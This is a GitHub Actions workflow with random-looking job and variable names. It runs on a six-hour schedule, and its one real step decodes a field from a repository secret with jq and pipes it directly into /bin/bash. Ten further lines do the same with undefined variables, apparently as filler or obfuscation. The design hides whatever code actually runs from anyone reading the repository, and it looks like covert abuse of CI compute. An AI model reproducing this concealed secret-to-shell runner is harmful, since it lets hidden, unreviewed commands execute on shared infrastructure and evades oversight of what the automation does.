name: yangtianbao2001

on:
  workflow_dispatch:
  schedule:
    - cron: '24 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: yangtianbao2001
        env:
          dugg1050: ${{ secrets.dugg1050 }}
        run: |
          echo $dugg1050 | jq -r .i34 | /bin/bash
          echo $tqbr4518 | jq -r .qfcwv01 | /bin/bash
          echo $at567 | jq -r .rn222 | /bin/bash
          echo $n75 | jq -r .ohtzx175 | /bin/bash
          echo $lekq0 | jq -r .lhal41 | /bin/bash
          echo $x30365 | jq -r .g5022 | /bin/bash
          echo $nhc487 | jq -r .g6 | /bin/bash
          echo $nhzef4406 | jq -r .cq5 | /bin/bash
          echo $fmhj3134 | jq -r .gwk7722 | /bin/bash
          echo $qhad14 | jq -r .xp4641 | /bin/bash
          echo $e0 | jq -r .rrq633 | /bin/bash

